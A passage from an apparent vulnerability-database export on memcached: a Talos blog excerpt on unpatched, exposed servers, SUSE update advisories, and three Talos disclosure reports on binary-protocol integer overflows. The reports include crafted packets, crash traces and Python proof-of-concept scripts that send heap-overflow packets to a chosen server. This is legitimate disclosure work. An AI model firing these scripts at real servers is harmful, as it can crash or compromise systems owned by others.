accessible memcached servers on the Internet. Second, less than a quarter have authentication enabled, making the rest fully open to abuse even in the absence of exploitable remote code execution vulnerabilities. Third, people are slow to patch their existing servers, which leads to a large number of servers in risk of potential full compromise through vulnerabilities we reported. And fourth, a negligible number of servers with authentication enabled are also patched, leading to the conclusion that system administrators think authentication is enough and patches don't warrant updating. All four of these points are bad.<br /><h3 id=\"h.snvzk0d881xy\">Notifications</h3><h3 id=\"h.snvzk0d881xy\"> </h3>After the scans were completed and conclusions were drawn, we made queries for all IP addresses to get contact emails for responsible organizations in order to send a notification with a simple explanation and suggestions to remedy this issue. This resulted in about 31 thousand unique emails which are pending notifications.<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-jZQaqu9pIDw/WWzGnAGIDYI/AAAAAAAAAUg/UIJLwX_fB-8Ga9Xb6-qaZUa2lvq9EG0CwCLcBGAs/s1600/image1.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"768\" data-original-width=\"887\" height=\"554\" src=\"https://3.bp.blogspot.com/-jZQaqu9pIDw/WWzGnAGIDYI/AAAAAAAAAUg/UIJLwX_fB-8Ga9Xb6-qaZUa2lvq9EG0CwCLcBGAs/s640/image1.png\" width=\"640\" /></a></div><h3 id=\"h.346t0le9ohzt\">Redoing scans</h3><br />After notifications were sent, we repeated the scans six months later to see if the notifications had any significant impact. Overall the results were disappointing, it appears the notifications largely fell on deaf ears. As you can see below only a small percentage, ~10%, of systems were patched. Additionally, there is still a significant amount of servers that are vulnerable and still do not require authentication. Whats even more disturbing is that it appears that 26% of the servers that were originally found are no longer online, but the amount of systems that we found remained largely the same. This implies that either the systems just changed IP addresses or there are still a large amount of new systems being deployed with the vulnerable version of Memcached.<br /><br /><h4 id=\"h.w6e0beqzftmt\">Results: 6 Months Later</h4><br />Total servers with valid responses: 106001<br /><br />Total servers still vulnerable: 73403 (~69%)<br /><br />Total servers not vulnerable: 32598 (~30%)<br /><br />Total servers requiring authentication: 18173 (~17%)<br /><br />Total vulnerable servers requiring authentication: 18012 (~99%)<br /><br /><h4 id=\"h.7iqaeiak70og\">Results: Original Servers (107,786) Updated Results</h4><br />Total: 85,121<br /><br />Still vulnerable: 53,621<br /><br />No longer vulnerable: 2,958<br /><br />Not online: 28,542 (~26%)<br /><br /><h3 id=\"h.nt3dvo7xe9p8\">Conclusion</h3><br />The severity of these types of vulnerabilities cannot be overstated. These vulnerabilities potentially affect a platform that is deployed across the internet by small and large enterprises alike. With the recent spate of worm attacks leveraging vulnerabilities this should be a red flag for administrators around the world. If left unaddressed the vulnerabilities could be leveraged to impact organizations globally and impact business severely. It is highly recommended that these systems be patched immediately to help mitigate the risk to organizations.<br /><br /><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=2wKLra7iGPw:49fMqL8jbks:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/2wKLra7iGPw\" height=\"1\" width=\"1\" alt=\"\"/>", "modified": "2017-07-21T14:25:15", "published": "2017-07-17T07:35:00", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/2wKLra7iGPw/memcached-patch-failure.html", "id": "TALOSBLOG:C9CDF0BBD65EE0553C843FD8CACCB478", "title": "Memcached - A Story of Failed Patching & Vulnerable Servers", "type": "talosblog", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2018-03-22T20:37:19", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7291", "CVE-2016-8705", "CVE-2016-8704", "CVE-2013-0179", "CVE-2011-4971", "CVE-2013-7290", "CVE-2013-7239", "CVE-2017-9951", "CVE-2016-8706"], "description": "This update for memcached fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2011-4971: remote DoS (bsc#817781).\n - CVE-2013-0179: DoS when printing out keys to be deleted in verbose mode\n (bsc#798458).\n - CVE-2013-7239: SASL authentication allows wrong credentials to access\n memcache (bsc#857188).\n - CVE-2013-7290: remote DoS (segmentation fault) via a request to delete a\n key (bsc#858677).\n - CVE-2013-7291: remote DoS (crash) via a request that triggers "unbounded\n key print" (bsc#858676).\n - CVE-2016-8704: Server append/prepend remote code execution (bsc#1007871).\n - CVE-2016-8705: Server update remote code execution (bsc#1007870).\n - CVE-2016-8706: Server ASL authentication remote code execution\n (bsc#1007869).\n - CVE-2017-9951: Heap-based buffer over-read in try_read_command function\n (incomplete fix for CVE-2016-8705) (bsc#1056865).\n\n", "edition": 1, "modified": "2018-03-22T17:27:53", "published": "2018-03-22T17:27:53", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-03/msg00052.html", "id": "SUSE-SU-2018:0778-1", "type": "suse", "title": "Security update for memcached (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-26T16:42:30", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7291", "CVE-2016-8705", "CVE-2016-8704", "CVE-2013-0179", "CVE-2011-4971", "CVE-2013-7290", "CVE-2013-7239", "CVE-2017-9951", "CVE-2016-8706"], "description": "This update for memcached fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2011-4971: remote DoS (bsc#817781).\n - CVE-2013-0179: DoS when printing out keys to be deleted in verbose mode\n (bsc#798458).\n - CVE-2013-7239: SASL authentication allows wrong credentials to access\n memcache (bsc#857188).\n - CVE-2013-7290: remote DoS (segmentation fault) via a request to delete a\n key (bsc#858677).\n - CVE-2013-7291: remote DoS (crash) via a request that triggers "unbounded\n key print" (bsc#858676).\n - CVE-2016-8704: Server append/prepend remote code execution (bsc#1007871).\n - CVE-2016-8705: Server update remote code execution (bsc#1007870).\n - CVE-2016-8706: Server ASL authentication remote code execution\n (bsc#1007869).\n - CVE-2017-9951: Heap-based buffer over-read in try_read_command function\n (incomplete fix for CVE-2016-8705) (bsc#1056865).\n\n", "edition": 1, "modified": "2018-03-26T15:09:40", "published": "2018-03-26T15:09:40", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-03/msg00059.html", "id": "SUSE-SU-2018:0807-1", "type": "suse", "title": "Security update for memcached (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "talos": [{"lastseen": "2020-07-01T21:25:06", "bulletinFamily": "info", "cvelist": ["CVE-2016-8706"], "description": "# Talos Vulnerability Report\n\n### TALOS-2016-0221\n\n## Memcached Server SASL Autentication Remote Code Execution Vulnerability\n\n##### October 31, 2016\n\n##### CVE Number\n\nCVE-2016-8706\n\n### Summary\n\nAn integer overflow in process_bin_sasl_auth function which is responsible for authentication commands of Memcached binary protocol can be abused to cause heap overflow and lead to remote code execution.\n\n### Tested Versions\n\nMemcached 1.4.31\n\n### Product URLs\n\n<https://memcached.org/>\n\n### CVSSv3 Score\n\n8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### Details\n\nMemcached is a high performance object caching server intended for speeding up dynamic web applications and is used by some of the most popular Internet websites. It has two versions of the protocol for storing and retrieving arbitrary data, an ASCII based one and a binary one. The binary protocol is optimized for size.\n\nIf enabled during compilation, Memcached can support authentication using SASL. An integer overflow can be triggered by sending a specially crafted authentication command. The affected command is SASL Auth whose opcode is 0x21.\n\nThe function responsible for parsing an authentication packet is `process_bin_sasl_auth`:\n \n \n static void process_bin_sasl_auth(conn *c) {\n // Guard for handling disabled SASL on the server.\n if (!settings.sasl) {\n write_bin_error(c, PROTOCOL_BINARY_RESPONSE_UNKNOWN_COMMAND, NULL,\n c->binary_header.request.bodylen\n - c->binary_header.request.keylen);\n return;\n }\n \n assert(c->binary_header.request.extlen == 0);\n \n int nkey = c->binary_header.request.keylen;\t\t[1]\n int vlen = c->binary_header.request.bodylen - nkey;\t[2]\n \n if (nkey > MAX_SASL_MECH_LEN) {\t\t\t[3]\n write_bin_error(c, PROTOCOL_BINARY_RESPONSE_EINVAL, NULL, vlen);\n c->write_and_go = conn_swallow;\n return;\n }\n \n char *key = binary_get_key(c);\n assert(key);\n \n item *it = item_alloc(key, nkey, 0, 0, vlen); [4]\n \n\nIn the above code, it should be noted that at [1] `nkey` is declared as a signed integer, and at [2] an integer overflow is possible if the value of `bodylen` is less than `nkey` resulting in a small or possibly negative value of `vlen` which is then used at [4] in a call to `item_alloc`. At [3] a check limits the values `nkey` can take (MAX_SASL_MECH_LEN is 32).\n\nFunction `item_alloc` is a wrapper around `do_item_alloc` which allocates the memory for the item and copies the key:\n \n \n ...\n size_t ntotal = item_make_header(nkey + 1, flags, nbytes, suffix, &nsuffix); [1]\n ...\n it = slabs_alloc(ntotal, id, &total_bytes, 0);\t\t\t\t[2]\n \n ...\n memcpy(ITEM_key(it), key, nkey);\t\t\t\t\t\t[3]\n it->exptime = exptime;\n memcpy(ITEM_suffix(it), suffix, (size_t)nsuffix);\n it->nsuffix = nsuffix;\n \n\nAt [1], `nkey` corresponds to the specified key length and `nbytes` to the previously calculated `vlen` value. At [2] the total resulting value is used as the size for allocation which ends up being too small to hold the key which leads to a heap buffer overflow at [3]. At the time of the overflow, the contents of `nkey` and the contents of memory pointed to by `key` are under direct control of the attacker.\n\nThe following packet has all the conditions to trigger the vulnerability:\n \n \n MEMCACHED_REQUEST_MAGIC = \"\\x80\"\n OPCODE_SET = \"\\x21\"\n key_len = struct.pack(\"!H\",32)\n body_len = struct.pack(\"!I\",1)\n packet = MEMCACHED_REQUEST_MAGIC + OPCODE_SET + key_len + body_len*2 + \"A\"*1000\n \n\nIn the above packet, body length is specified to be 1, and key length 32, resulting in an integer overflow which causes too little memory to be allocated, causing a heap buffer overflow during a memcpy call.\n\n### Crash Information\n\nSimply sending the above packet triggers the heap overflow but doesn\u2019t cause a direct crash. In order to observe the issue, the server can be run under valgrind (with SASL authentication enabled) which then results in the following trace:\n \n \n <36 new binary client connection.\n 36: going from conn_new_cmd to conn_waiting\n 36: going from conn_waiting to conn_read\n 36: going from conn_read to conn_parse_cmd\n <36 Read binary protocol data:\n <36 0x80 0x21 0x00 0x20\n <36 0x00 0x00 0x00 0x01\n <36 0x00 0x00 0x00 0x01\n <36 0x41 0x41 0x41 0x41\n <36 0x41 0x41 0x41 0x41\n <36 0x41 0x41 0x41 0x41\n authenticated() in cmd 0x21 is true\n 36: going from conn_parse_cmd to conn_nread\n ==601== Thread 3:\n ==601== Invalid write of size 4\n ==601== at 0x8059DD8: do_item_alloc (items.c:242)\n ==601== by 0x8050565: process_bin_sasl_auth (memcached.c:1881)\n ==601== by 0x8050565: complete_nread_binary (memcached.c:2450)\n ==601== by 0x8050565: complete_nread (memcached.c:2484)\n ==601== by 0x80540AE: drive_machine (memcached.c:4656)\n ==601== by 0x40686B5: event_base_loop (in /usr/lib/libevent-2.0.so.5.1.9)\n ==601== by 0x805B1B8: worker_libevent (thread.c:380)\n ==601== by 0x40CB312: start_thread (pthread_create.c:310)\n ==601== by 0x41DAF2D: clone (clone.S:122)\n ==601== Address 0x45adc25 is 1,048,557 bytes inside a block of size 1,048,560 alloc'd\n ==601== at 0x402B211: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==601== by 0x8056218: memory_allocate (slabs.c:538)\n ==601== by 0x8056218: do_slabs_newslab (slabs.c:233)\n ==601== by 0x8056295: do_slabs_alloc (slabs.c:328)\n ==601== by 0x8056843: slabs_alloc (slabs.c:584)\n ==601== by 0x8059B7D: do_item_alloc (items.c:180)\n ==601== by 0x8050565: process_bin_sasl_auth (memcached.c:1881)\n ==601== by 0x8050565: complete_nread_binary (memcached.c:2450)\n ==601== by 0x8050565: complete_nread (memcached.c:2484)\n ==601== by 0x80540AE: drive_machine (memcached.c:4656)\n ==601== by 0x40686B5: event_base_loop (in /usr/lib/libevent-2.0.so.5.1.9)\n ==601== by 0x805B1B8: worker_libevent (thread.c:380)\n ==601== by 0x40CB312: start_thread (pthread_create.c:310)\n ==601== by 0x41DAF2D: clone (clone.S:122)\n ==601==\n \n\n### Exploit Proof-of-Concept (optional)\n \n \n import struct\n import socket\n import sys\n \n \n MEMCACHED_REQUEST_MAGIC = \"\\x80\"\n OPCODE_SET = \"\\x21\"\n key_len = struct.pack(\"!H\",32)\n body_len = struct.pack(\"!I\",1)\n packet = MEMCACHED_REQUEST_MAGIC + OPCODE_SET + key_len + body_len*2 + \"A\"*1000\n if len(sys.argv) != 3:\n \tprint \"./poc_sasl.py <server> <ip>\"\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((sys.argv[1],int(sys.argv[2])))\n s.sendall(packet)\n print s.recv(1024)\n s.close()\n \n\n### Timeline\n\n2016-10-10 - Vendor Disclosure \n2016-10-12 - Vendor Patched \n2016-10-31 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2016-0220\n\nPrevious Report\n\nTALOS-2016-0183\n", "edition": 11, "modified": "2016-10-31T00:00:00", "published": "2016-10-31T00:00:00", "id": "TALOS-2016-0221", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2016-0221", "title": "Memcached Server SASL Autentication Remote Code Execution Vulnerability", "type": "talos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-01T21:25:37", "bulletinFamily": "info", "cvelist": ["CVE-2016-8705"], "description": "# Talos Vulnerability Report\n\n### TALOS-2016-0220\n\n## Memcached Server Update Remote Code Execution Vulnerability\n\n##### October 31, 2016\n\n##### CVE Number\n\nCVE-2016-8705\n\n### Summary\n\nMultiple integer overflows in process_bin_update function which is responsible for processing multiple commands of Memcached binary protocol can be abused to cause heap overflow and lead to remote code execution.\n\n### Tested Versions\n\nMemcached 1.4.31\n\n### Product URLs\n\n<https://memcached.org/>\n\n### CVSSv3 Score\n\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### Details\n\nMemcached is a high performance object caching server intended for speeding up dynamic web applications and is used by some of the most popular Internet websites. It has two versions of the protocol for storing and retrieving arbitrary data, an ASCII based one and a binary one. The binary protocol is optimized for size.\n\nAn integer overflow can be triggered by issuing a command that adds or replaces an existing key-value pair. The affected commands are: Set (opcode 0x01), Add (opcode 0x02), Replace (opcode 0x03) , SetQ (opcode 0x11), AddQ (opcode 0x12) and ReplaceQ (opcode 0x13) which all call into `process_bin_update` function.\n\nWhile parsing a binary packet, the process ends up in the following switch case in `memcached.c`:\n \n \n case PROTOCOL_BINARY_CMD_SET: /* FALLTHROUGH */\n case PROTOCOL_BINARY_CMD_ADD: /* FALLTHROUGH */\n case PROTOCOL_BINARY_CMD_REPLACE:\n if (extlen == 8 && keylen != 0 && bodylen >= (keylen + 8)) {\n bin_read_key(c, bin_reading_set_header, 8);\n } else {\n protocol_error = 1;\n }\n \n\nIf any of the `set`,`add` and `replace` (or their quiet equivalents) is received a check is made before calling `bin_read_key`. It should be noted that `keylen` and `bodylen` are of type `int` and `uint_32` respectively. In `dispatch_bin_command`:\n \n \n int extlen = c->binary_header.request.extlen;\n int keylen = c->binary_header.request.keylen;\n uint32_t bodylen = c->binary_header.request.bodylen;\n \n\nThis is the first condition that must hold in order to reach the vulnerability. After reading the key, the process ends up in `process_bin_update` function where the integer overflow happens:\n \n \n static void process_bin_update(conn *c) {\n char *key;\n int nkey;\t\t\t\t\t\t\t[1]\n int vlen;\t\t\t\t\t\t\t[2]\n item *it;\n protocol_binary_request_set* req = binary_get_request(c);\n \n assert(c != NULL);\n \n key = binary_get_key(c);\n nkey = c->binary_header.request.keylen;\n \n /* fix byteorder in the request */\n req->message.body.flags = ntohl(req->message.body.flags);\n req->message.body.expiration = ntohl(req->message.body.expiration);\n \n vlen = c->binary_header.request.bodylen - (nkey + c->binary_header.request.extlen); [3]\n \n\nNotice that at [1] and [2] `nkey` and `vlen` are of type `int` and recall that `bodylen` is an unsigned integer. Because of the difference in signedness between `bodylen` and `vlen` an integer overflow can occur resulting in a negative value of `vlen` at [3]. The first required check has passed because integer promotions work in our favor, but in the second case, the final value of the arithmetic expression at [3] (an unsigned value) gets assigned to a signed value. The value in `vlen` is then used to allocate and store an item:\n \n \n it = item_alloc(key, nkey, req->message.body.flags,\n realtime(req->message.body.expiration), vlen+2);\n \n\nFunction `item_alloc` is a wrapper around `do_item_alloc` which allocates the memory for the item and copies the key:\n \n \n ...\n size_t ntotal = item_make_header(nkey + 1, flags, nbytes, suffix, &nsuffix); [1]\n ...\n it = slabs_alloc(ntotal, id, &total_bytes, 0);\t\t\t\t[2]\n \n ...\n memcpy(ITEM_key(it), key, nkey);\t\t\t\t\t\t[3]\n it->exptime = exptime;\n memcpy(ITEM_suffix(it), suffix, (size_t)nsuffix);\n it->nsuffix = nsuffix;\n \n\nAt [1], `nkey` corresponds to the specified key length and `nbytes` to the previously calculated `vlen` value. At [2] the total resulting value is used as the size for allocation which ends up being too small to hold the key which leads to a heap buffer overflow at [3]. At the time of the overflow, the contents of `nkey` and the contents of memory pointed to by `key` are under direct control of the attacker.\n\nThe following packet has all the conditions necessary to trigger the vulnerability:\n \n \n MEMCACHED_REQUEST_MAGIC = \"\\x80\"\n OPCODE_ADD = \"\\x02\"\n key_len = struct.pack(\"!H\",0xfa)\n extra_len = \"\\x08\"\n data_type = \"\\x00\"\n vbucket = \"\\x00\\x00\"\n body_len = struct.pack(\"!I\",0xffffffd0)\n opaque = struct.pack(\"!I\",0)\n CAS = struct.pack(\"!Q\",0)\n extras_flags = 0xdeadbeef\n extras_expiry = struct.pack(\"!I\",0xe10)\n body = \"A\"*1024\n \n\nThe value of `extra_len` must be 0x8 as it is directly checked. The value of `body_len` must be greater than `key_len` when compared as unsigned integers, `key_len` also has to be greater than 0. Other checks in the code constrain the value of `body_len` required to trigger the vulnerability to the 0xFFFFFFF0-0xFFFFFFFF range.\n\nThe vulnerability can be triggered multiple times, and can be abused to modify internal slab metadata. As such, it can also be abused to cause information leaks required for successful exploitation.\n\n### Crash Information\n\nSimply sending the above packet triggers the heap overflow but doesn\u2019t cause a direct crash. In order to observe the issue, the server can be run under valgrind which then results in the following crash:\n \n \n <30 new auto-negotiating client connection\n 30: going from conn_new_cmd to conn_waiting\n 30: going from conn_waiting to conn_read\n 30: going from conn_read to conn_parse_cmd\n 30: Client using the binary protocol\n <30 Read binary protocol data:\n <30 0x80 0x02 0x00 0xfa\n <30 0x08 0x00 0x00 0x00\n <30 0xff 0xff 0xff 0xd0\n <30 0x00 0x00 0x00 0x00\n <30 0x00 0x00 0x00 0x00\n <30 0x00 0x00 0x00 0x00\n 30: going from conn_parse_cmd to conn_nread\n <30 ADD AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Value len is -306\n ==32759== Thread 3:\n ==32759== Invalid write of size 4\n ==32759== at 0x402FCC2: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==32759== by 0x8059CB9: do_item_alloc (items.c:240)\n ==32759== by 0x8050CBC: process_bin_update (memcached.c:2222)\n ==32759== by 0x8050CBC: complete_nread_binary (memcached.c:2427)\n ==32759== by 0x8050CBC: complete_nread (memcached.c:2484)\n ==32759== by 0x80540AE: drive_machine (memcached.c:4656)\n ==32759== by 0x40686B5: event_base_loop (in /usr/lib/libevent-2.0.so.5.1.9)\n ==32759== by 0x805B1B8: worker_libevent (thread.c:380)\n ==32759== by 0x40CB312: start_thread (pthread_create.c:310)\n ==32759== by 0x41DAF2D: clone (clone.S:122)\n ==32759== Address 0x459cc48 is 0 bytes after a block of size 1,048,560 alloc'd\n ==32759== at 0x402B211: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==32759== by 0x8056218: memory_allocate (slabs.c:538)\n ==32759== by 0x8056218: do_slabs_newslab (slabs.c:233)\n ==32759== by 0x8056295: do_slabs_alloc (slabs.c:328)\n ==32759== by 0x8056843: slabs_alloc (slabs.c:584)\n ==32759== by 0x8059B7D: do_item_alloc (items.c:180)\n ==32759== by 0x8050CBC: process_bin_update (memcached.c:2222)\n ==32759== by 0x8050CBC: complete_nread_binary (memcached.c:2427)\n ==32759== by 0x8050CBC: complete_nread (memcached.c:2484)\n ==32759== by 0x80540AE: drive_machine (memcached.c:4656)\n ==32759== by 0x40686B5: event_base_loop (in /usr/lib/libevent-2.0.so.5.1.9)\n ==32759== by 0x805B1B8: worker_libevent (thread.c:380)\n ==32759== by 0x40CB312: start_thread (pthread_create.c:310)\n ==32759== by 0x41DAF2D: clone (clone.S:122)\n ==32759==\n \n\n### Exploit Proof-of-Concept (optional)\n \n \n import struct\n import socket\n import sys\n \n \n MEMCACHED_REQUEST_MAGIC = \"\\x80\"\n OPCODE_ADD = \"\\x02\"\n key_len = struct.pack(\"!H\",0xfa)\n extra_len = \"\\x08\"\n data_type = \"\\x00\"\n vbucket = \"\\x00\\x00\"\n body_len = struct.pack(\"!I\",0xffffffd0)\n opaque = struct.pack(\"!I\",0)\n CAS = struct.pack(\"!Q\",0)\n extras_flags = 0xdeadbeef\n extras_expiry = struct.pack(\"!I\",0xe10)\n body = \"A\"*1024\n \n packet = MEMCACHED_REQUEST_MAGIC + OPCODE_ADD + key_len + extra_len\n packet += data_type + vbucket + body_len + opaque + CAS\n packet += body\n if len(sys.argv != 3):\n \tprint \"./poc_add.py <server> <port>\"\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((sys.argv[1],int(sys.argv[2])))\n s.sendall(packet)\n print s.recv(1024)\n s.close()\n \n\n### Timeline\n\n2016-10-10 - Vendor Disclosure \n2016-10-12 - Vendor Patched \n2016-10-31 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2016-0219\n\nPrevious Report\n\nTALOS-2016-0221\n", "edition": 11, "modified": "2016-10-31T00:00:00", "published": "2016-10-31T00:00:00", "id": "TALOS-2016-0220", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2016-0220", "title": "Memcached Server Update Remote Code Execution Vulnerability", "type": "talos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-01T21:24:54", "bulletinFamily": "info", "cvelist": ["CVE-2016-8704"], "description": "# Talos Vulnerability Report\n\n### TALOS-2016-0219\n\n## Memcached Server Append/Prepend Remote Code Execution Vulnerability\n\n##### October 31, 2016\n\n##### CVE Number\n\nCVE-2016-8704\n\n### Summary\n\nAn integer overflow in the process_bin_append_prepend function which is responsible for processing multiple commands of Memcached binary protocol can be abused to cause heap overflow and lead to remote code execution.\n\n### Tested Versions\n\nMemcached 1.4.31\n\n### Product URLs\n\n<https://memcached.org/>\n\n### CVSSv3 Score\n\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### Details\n\nMemcached is a high performance object caching server intended for speeding up dynamic web applications and is used by some of the most popular Internet websites. It has two versions of the protocol for storing and retrieving arbitrary data, an ASCII based one and a binary one. The binary protocol is optimized for size.\n\nAn integer overflow can be triggered by issuing a command that appends or prepends data to an existing key-value pair. Affected commands are: Append (opcode 0x0e), Prepend (opcode 0x0f), AppendQ (0x19), PrependQ (opcode 0x1a) which all call into `process_bin_append_prepend` function.\n\nWhile parsing a binary packet, the process ends up in the following switch case in `memcached.c`:\n \n \n case PROTOCOL_BINARY_CMD_APPEND:\n case PROTOCOL_BINARY_CMD_PREPEND:\n if (keylen > 0 && extlen == 0) {\n bin_read_key(c, bin_reading_set_header, 0);\n } else {\n protocol_error = 1;\n }\n break;\n \n\nIf either the `append` or `prepend` commands (or their quiet equivalents) are executed, no check is made on the specified value of the body length.\n\nAfter reading the key, the parser ends up in the following code:\n\nstatic void process_bin_append_prepend(conn *c) { char *key; int nkey; int vlen; [1] item *it;\n \n \n assert(c != NULL);\n \n key = binary_get_key(c);\n nkey = c->binary_header.request.keylen;\t[2]\n vlen = c->binary_header.request.bodylen - nkey; [3]\n \n if (settings.verbose > 1) {\n fprintf(stderr, \"Value len is %d\\n\", vlen);\n }\n \n if (settings.detail_enabled) {\n stats_prefix_record_set(key, nkey);\n }\n \n it = item_alloc(key, nkey, 0, 0, vlen+2); [4]\n \n\nNotice that at [1] `nkey` and `vlen` are signed integers. At [2] `keylen`, which is unsigned, gets assigned to `nkey` (signed). At [3], an integer overflow can occur if `bodylen` is less than `nkey` both of which come directly from the network and are under direct attacker control. The value of `vlen` can end up being small and even negative and is later used in `item_alloc`. Function `item_alloc` is a wrapper around `do_item_alloc` which allocates the memory for the item and copies the key:\n \n \n ...\n size_t ntotal = item_make_header(nkey + 1, flags, nbytes, suffix, &nsuffix); [1]\n ...\n it = slabs_alloc(ntotal, id, &total_bytes, 0);\t\t\t\t[2]\n \n ...\n memcpy(ITEM_key(it), key, nkey);\t\t\t\t\t\t[3]\n it->exptime = exptime;\n memcpy(ITEM_suffix(it), suffix, (size_t)nsuffix);\n it->nsuffix = nsuffix;\n \n\nAt [1], `nkey` corresponds to the specified key length and `nbytes` to the previously calculated `vlen` value. At [2] the total resulting value is used as the size for allocation which ends up being too small to hold the key which leads to a heap buffer overflow at [3]. At the time of the overflow, the contents of `nkey` and the contents of the memory pointed to by `key` are under direct control of the attacker.\n\nThe following packet has all the conditions necessary to trigger the vulnerability:\n \n \n MEMCACHED_REQUEST_MAGIC = \"\\x80\"\n OPCODE_PREPEND = \"\\x0f\"\n key_len = struct.pack(\"!H\",0xfa)\n extra_len = \"\\x00\"\n data_type = \"\\x00\"\n vbucket = \"\\x00\\x00\"\n body_len = struct.pack(\"!I\",0)\n opaque = struct.pack(\"!I\",0)\n CAS = struct.pack(\"!Q\",0)\n body = \"A\"*1024\n \n\nIn the above packet, body length is specified to be 0, and key length 0xfa, resulting in an integer overflow which causes too small area of memory to be allocated causing a heap buffer overflow.\n\nThe vulnerability can be triggered multiple times, and can be abused to modify internal slab metadata. As such, it can also be abused to cause information leaks required for successful exploitation.\n\n### Crash Information\n\nSimply sending the above packet triggers the heap overflow but doesn\u2019t cause a direct crash. In order to observe the issue, the server can be run under valgrind which then results in the following trace:\n \n \n <37 new auto-negotiating client connection\n 37: going from conn_new_cmd to conn_waiting\n 37: going from conn_waiting to conn_read\n 37: going from conn_read to conn_parse_cmd\n 37: Client using the binary protocol\n <37 Read binary protocol data:\n <37 0x80 0x1a 0x00 0xfa\n <37 0x00 0x00 0x00 0x00\n <37 0x00 0x00 0x00 0x00\n <37 0x00 0x00 0x00 0x00\n <37 0x00 0x00 0x00 0x00\n <37 0x00 0x00 0x00 0x00\n 37: going from conn_parse_cmd to conn_nread\n Value len is -250\n 36: going from conn_write to conn_new_cmd\n 36: going from conn_new_cmd to conn_waiting\n 36: going from conn_waiting to conn_read\n 36: going from conn_read to conn_closing\n <36 connection closed.\n ==466== Thread 4:\n ==466== Invalid write of size 4\n ==466== at 0x402FCC2: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==466== by 0x8059CB9: do_item_alloc (items.c:240)\n ==466== by 0x8051589: process_bin_append_prepend (memcached.c:2302)\n ==466== by 0x8051589: complete_nread_binary (memcached.c:2425)\n ==466== by 0x8051589: complete_nread (memcached.c:2484)\n ==466== by 0x80540AE: drive_machine (memcached.c:4656)\n ==466== by 0x40686B5: event_base_loop (in /usr/lib/libevent-2.0.so.5.1.9)\n ==466== by 0x805B1B8: worker_libevent (thread.c:380)\n ==466== by 0x40CB312: start_thread (pthread_create.c:310)\n ==466== by 0x41DAF2D: clone (clone.S:122)\n ==466== Address 0x459cc48 is 0 bytes after a block of size 1,048,560 alloc'd\n ==466== at 0x402B211: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==466== by 0x8056218: memory_allocate (slabs.c:538)\n ==466== by 0x8056218: do_slabs_newslab (slabs.c:233)\n ==466== by 0x8056295: do_slabs_alloc (slabs.c:328)\n ==466== by 0x8056843: slabs_alloc (slabs.c:584)\n ==466== by 0x8059B7D: do_item_alloc (items.c:180)\n ==466== by 0x804E515: process_update_command (memcached.c:3403)\n ==466== by 0x8052024: process_command (memcached.c:3840)\n ==466== by 0x8053AA5: try_read_command (memcached.c:4205)\n ==466== by 0x8053AA5: drive_machine (memcached.c:4618)\n ==466== by 0x40686B5: event_base_loop (in /usr/lib/libevent-2.0.so.5.1.9)\n ==466== by 0x805B1B8: worker_libevent (thread.c:380)\n ==466== by 0x40CB312: start_thread (pthread_create.c:310)\n ==466== by 0x41DAF2D: clone (clone.S:122)\n ==466==\n ==466== Invalid read of size 4\n ==466== at 0x804D16E: conn_set_state.isra.3 (memcached.c:794)\n ==466== by 0x8050D52: process_bin_update (memcached.c:2278)\n ==466== by 0x8050D52: complete_nread_binary (memcached.c:2427)\n ==466== by 0x8050D52: complete_nread (memcached.c:2484)\n ==466== by 0x80540AE: drive_machine 